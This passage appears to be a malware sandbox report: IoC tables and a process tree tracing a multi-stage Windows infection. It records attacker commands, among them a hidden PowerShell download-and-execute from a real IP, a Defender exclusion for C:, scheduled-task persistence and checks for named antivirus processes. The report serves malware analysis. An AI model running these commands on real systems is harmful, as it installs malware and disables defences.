3624	ecdbcb1f1d.exe
3624	ecdbcb1f1d.exe
4440	qhjMWht.exe
4440	qhjMWht.exe
4440	qhjMWht.exe
4440	qhjMWht.exe
4440	qhjMWht.exe
4440	qhjMWht.exe
5364	MSBuild.exe
5364	MSBuild.exe
5364	MSBuild.exe
5364	MSBuild.exe
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
2984	Yhihb8G.exe
2984	Yhihb8G.exe
2984	Yhihb8G.exe
2984	Yhihb8G.exe
2984	Yhihb8G.exe
3284	9sWdA2p.exe
3284	9sWdA2p.exe
3284	9sWdA2p.exe
3284	9sWdA2p.exe
3284	9sWdA2p.exe
3284	9sWdA2p.exe
408	MSBuild.exe
408	MSBuild.exe
408	MSBuild.exe
408	MSBuild.exe
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
2180	powershell.exe
2180	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5472	UZPt0hR.exe
5472	UZPt0hR.exe
5472	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeDebugPrivilege	5212	powershell.exe
Token: SeDebugPrivilege	6008	tasklist.exe
Token: SeDebugPrivilege	6096	tasklist.exe
Token: SeDebugPrivilege	2984	Yhihb8G.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	5124	tasklist.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	7524	55a96727.exe
Token: SeBackupPrivilege	7524	55a96727.exe
Token: SeRestorePrivilege	7524	55a96727.exe
Token: SeLoadDriverPrivilege	7524	55a96727.exe
Token: SeShutdownPrivilege	7524	55a96727.exe
Token: SeSystemEnvironmentPrivilege	7524	55a96727.exe
Token: SeSecurityPrivilege	7524	55a96727.exe
Token: SeBackupPrivilege	7524	55a96727.exe
Token: SeRestorePrivilege	7524	55a96727.exe
Token: SeDebugPrivilege	7524	55a96727.exe
Token: SeSystemEnvironmentPrivilege	7524	55a96727.exe
Token: SeSecurityPrivilege	7524	55a96727.exe
Token: SeCreatePermanentPrivilege	7524	55a96727.exe
Token: SeShutdownPrivilege	7524	55a96727.exe
Token: SeLoadDriverPrivilege	7524	55a96727.exe
Token: SeIncreaseQuotaPrivilege	7524	55a96727.exe
Token: SeSecurityPrivilege	7524	55a96727.exe
Token: SeSystemProfilePrivilege	7524	55a96727.exe
Token: SeDebugPrivilege	7524	55a96727.exe
Token: SeMachineAccountPrivilege	7524	55a96727.exe
Token: SeCreateTokenPrivilege	7524	55a96727.exe
Token: SeAssignPrimaryTokenPrivilege	7524	55a96727.exe
Token: SeTcbPrivilege	7524	55a96727.exe
Token: SeAuditPrivilege	7524	55a96727.exe
Token: SeSystemEnvironmentPrivilege	7524	55a96727.exe
Token: SeLoadDriverPrivilege	7524	55a96727.exe
Token: SeLoadDriverPrivilege	7524	55a96727.exe
Token: SeIncreaseQuotaPrivilege	7524	55a96727.exe
Token: SeSecurityPrivilege	7524	55a96727.exe
Token: SeSystemProfilePrivilege	7524	55a96727.exe
Token: SeDebugPrivilege	7524	55a96727.exe
Token: SeMachineAccountPrivilege	7524	55a96727.exe
Token: SeCreateTokenPrivilege	7524	55a96727.exe
Token: SeAssignPrimaryTokenPrivilege	7524	55a96727.exe
Token: SeTcbPrivilege	7524	55a96727.exe
Token: SeAuditPrivilege	7524	55a96727.exe
Token: SeSystemEnvironmentPrivilege	7524	55a96727.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1484	177f88e45a.exe
1484	177f88e45a.exe
1484	177f88e45a.exe
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
5656	Passwords.com
5656	Passwords.com
5656	Passwords.com

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
1484	177f88e45a.exe
1484	177f88e45a.exe
1484	177f88e45a.exe
5532	Jordan.com
5532	Jordan.com
5532	Jordan.com
5656	Passwords.com
5656	Passwords.com
5656	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3184 wrote to memory of 5320	3184	random.exe	89
PID 3184 wrote to memory of 5320	3184	random.exe	89
PID 3184 wrote to memory of 5320	3184	random.exe	89
PID 3520 wrote to memory of 5308	3520	cmd.exe	90
PID 3520 wrote to memory of 5308	3520	cmd.exe	90
PID 5320 wrote to memory of 2932	5320	h5p59.exe	92
PID 5320 wrote to memory of 2932	5320	h5p59.exe	92
PID 5320 wrote to memory of 2932	5320	h5p59.exe	92
PID 1968 wrote to memory of 5784	1968	cmd.exe	94
PID 1968 wrote to memory of 5784	1968	cmd.exe	94
PID 2932 wrote to memory of 4912	2932	1B04X6.exe	98
PID 2932 wrote to memory of 4912	2932	1B04X6.exe	98
PID 2932 wrote to memory of 4912	2932	1B04X6.exe	98
PID 5320 wrote to memory of 4860	5320	h5p59.exe	99
PID 5320 wrote to memory of 4860	5320	h5p59.exe	99
PID 5320 wrote to memory of 4860	5320	h5p59.exe	99
PID 4912 wrote to memory of 4356	4912	rapes.exe	111
PID 4912 wrote to memory of 4356	4912	rapes.exe	111
PID 4912 wrote to memory of 4356	4912	rapes.exe	111
PID 4912 wrote to memory of 1484	4912	rapes.exe	114
PID 4912 wrote to memory of 1484	4912	rapes.exe	114
PID 4912 wrote to memory of 1484	4912	rapes.exe	114
PID 1484 wrote to memory of 2432	1484	177f88e45a.exe	115
PID 1484 wrote to memory of 2432	1484	177f88e45a.exe	115
PID 1484 wrote to memory of 2432	1484	177f88e45a.exe	115
PID 1484 wrote to memory of 5600	1484	177f88e45a.exe	116
PID 1484 wrote to memory of 5600	1484	177f88e45a.exe	116
PID 1484 wrote to memory of 5600	1484	177f88e45a.exe	116
PID 2432 wrote to memory of 5992	2432	cmd.exe	118
PID 2432 wrote to memory of 5992	2432	cmd.exe	118
PID 2432 wrote to memory of 5992	2432	cmd.exe	118
PID 5600 wrote to memory of 5212	5600	mshta.exe	119
PID 5600 wrote to memory of 5212	5600	mshta.exe	119
PID 5600 wrote to memory of 5212	5600	mshta.exe	119
PID 4912 wrote to memory of 3432	4912	rapes.exe	121
PID 4912 wrote to memory of 3432	4912	rapes.exe	121
PID 4912 wrote to memory of 3432	4912	rapes.exe	121
PID 5212 wrote to memory of 2368	5212	powershell.exe	122
PID 5212 wrote to memory of 2368	5212	powershell.exe	122
PID 5212 wrote to memory of 2368	5212	powershell.exe	122
PID 4912 wrote to memory of 5108	4912	rapes.exe	124
PID 4912 wrote to memory of 5108	4912	rapes.exe	124
PID 4912 wrote to memory of 5108	4912	rapes.exe	124
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 5108 wrote to memory of 5788	5108	3368617c03.exe	126
PID 4912 wrote to memory of 3624	4912	rapes.exe	129
PID 4912 wrote to memory of 3624	4912	rapes.exe	129
PID 4912 wrote to memory of 3624	4912	rapes.exe	129
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130
PID 3624 wrote to memory of 2484	3624	ecdbcb1f1d.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3184
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h5p59.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h5p59.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5320
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1B04X6.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1B04X6.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4912
    - - C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4356
    - - C:\Users\Admin\AppData\Local\Temp\10444380101\177f88e45a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444380101\177f88e45a.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1484
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn XpLaQmac6NF /tr "mshta C:\Users\Admin\AppData\Local\Temp\LBfuMz2UZ.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2432
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn XpLaQmac6NF /tr "mshta C:\Users\Admin\AppData\Local\Temp\LBfuMz2UZ.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5992
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\LBfuMz2UZ.hta
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
        
        "C:\Users\Admin\AppData\Local\TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2368
    - - C:\Users\Admin\AppData\Local\Temp\10444390101\ba6103ae2a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444390101\ba6103ae2a.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3432
    - - C:\Users\Admin\AppData\Local\Temp\10444400101\3368617c03.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444400101\3368617c03.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5108
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444400101\3368617c03.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5788
    - - C:\Users\Admin\AppData\Local\Temp\10444410101\ecdbcb1f1d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444410101\ecdbcb1f1d.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3624
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444410101\ecdbcb1f1d.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2484
    - - C:\Users\Admin\AppData\Local\Temp\10444420101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444420101\qhjMWht.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4440
    - - C:\Users\Admin\AppData\Local\Temp\10444430101\ICQ0sog.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444430101\ICQ0sog.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5248
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5364
    - - C:\Users\Admin\AppData\Local\Temp\10444440101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444440101\larBxd7.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3752
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3236
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6008
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:972
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6096
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:768
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4924
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3564
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6032
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5532
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5944
    - - C:\Users\Admin\AppData\Local\Temp\10444450101\Yhihb8G.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444450101\Yhihb8G.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2984
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2420
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4108
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1688
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2488
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 2480
        6⤵
        Program crash
        
        PID:4524
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2744
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5652
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4844
    - - C:\Users\Admin\AppData\Local\Temp\10444460101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444460101\9sWdA2p.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3284
    - - C:\Users\Admin\AppData\Local\Temp\10444470101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444470101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1180
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:408
    - - C:\Users\Admin\AppData\Local\Temp\10444480101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444480101\7IIl2eE.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3468
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5644
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5112
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:676
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5124
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3688
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5240
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5476
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5848
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5656
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1008
    - - C:\Users\Admin\AppData\Local\Temp\10444490101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444490101\UZPt0hR.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: MapViewOfSection
        
        PID:5472
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:4352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:3104
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Executes dropped EXE
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        Deletes itself
        Executes dropped EXE
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\{3c92d765-5575-4f48-8f36-ed30adbe33ac}\70574084.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{3c92d765-5575-4f48-8f36-ed30adbe33ac}\70574084.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\{2b093e58-faaf-480b-83b1-936c6fc8da34}\55a96727.exe
        
        C:/Users/Admin/AppData/Local/Temp/{2b093e58-faaf-480b-83b1-936c6fc8da34}/\55a96727.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:7524
    - - C:\Users\Admin\AppData\Local\Temp\10444500101\4ceb664707.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444500101\4ceb664707.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:13240
    - - C:\Users\Admin\AppData\Local\Temp\10444510101\a8dea6421d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444510101\a8dea6421d.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5196
    - - C:\Users\Admin\AppData\Local\Temp\10444520101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444520101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6460
    - - C:\Users\Admin\AppData\Local\Temp\10444530101\i4cwegu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444530101\i4cwegu.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:8568
    - - C:\Users\Admin\AppData\Local\Temp\10444540101\but2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444540101\but2.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:11388
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:11736
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:11852
      - C:\Drivers\pcidrv.exe
        
        C:\Drivers\pcidrv.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:11964
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10444540101\but2.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:12012
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:12092
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2g3067.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2g3067.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\system32\rundll32.exe
